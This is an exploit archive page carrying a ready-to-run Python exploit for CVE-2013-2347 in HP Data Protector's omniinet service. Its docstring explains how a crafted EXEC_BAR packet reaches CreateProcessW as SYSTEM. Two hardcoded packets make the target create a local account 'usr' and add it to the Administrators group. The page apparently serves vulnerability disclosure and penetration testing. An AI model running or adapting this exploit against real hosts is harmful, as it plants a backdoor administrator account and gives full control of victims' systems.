exploit the possibilities

HP Data Protector EXEC_BAR Remote Command Execution

HP Data Protector EXEC_BAR Remote Command Execution
Posted Feb 17, 2014
Authored by Chris Graham

HP Data Protector EXEC_BAR remote command execution exploit that affects versions 6.10, 6.11, and 6.20.

tags | exploit, remote
advisories | CVE-2013-2347
MD5 | 4664adb906972194b524f406999b4e3b

HP Data Protector EXEC_BAR Remote Command Execution

Change Mirror Download
import argparse
import socket

"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:

The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omniinet service is
running as SYSTEM. This allows for complete compromise of the remote
host.

To exploit this vulnerability, you only need to send two specific arguments.
Omniinet has an argument parser that will extract these out and
eventually pass them to a call to CreateProcessW via the lpCommandLine
parameter.

When a packet is sent to the omniinet service, it will check the opcode
and look up an associated function to call based on the opcode in a table
of function pointers. The function to handle EXEC_BAR packets requires that
the packet contain at least 19 arguments. The 18th argument will be the
command we want to execute, and the 19th will be an argument we can pass to
the command we are executing. This exploit will create a new windows account
and add it to the local Administrators group. This means that lpCommandLine
that gets passed to CreateProcess will need to look like:

'c:\windows\system32\cmd.exe' '/c net user usr p@ss!23 /add'
and
'c:\windows\system32\cmd.exe' '/c net localgroup Administrators usr /add'

Note: The 19th value has size constraints so it needs to be as short of a
string as possible.
"""

exec_bar_add_user = \
"\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x75\x00\x73\x00" + \
"\x72\x00\x20\x00\x70\x00\x40\x00\x73\x00\x73\x00\x21\x00\x32\x00" + \
"\x33\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"

exec_bar_make_admin = \
"\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00" + \
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00" + \
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00" + \
"\x72\x00\x73\x00\x20\x00\x75\x00\x73\x00\x72\x00\x20\x00\x2f\x00" + \
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"

def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print "[-]ERROR CREATING SOCKET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print "[-]ERROR CONNECTING TO TARGET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock

def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res

cmdline_parser = argparse.ArgumentParser(description='HP Data Protector EXEC_BAR Remote Command Execution')
cmdline_parser.add_argument('-t', dest='ip', help='Target host ip', required=True)
cmdline_parser.add_argument('-p', dest='port', help='Target port', default=5555, type=int, required=False)
args = cmdline_parser.parse_args()

print "\n[*]ATTEMPING TO ADD WINDOWS ADMINISTRATOR ACCOUNT usr WITH PASSWORD p@ss!23"
for packet in [exec_bar_add_user, exec_bar_make_admin]:
target = connect_target(args.ip, args.port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()


Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close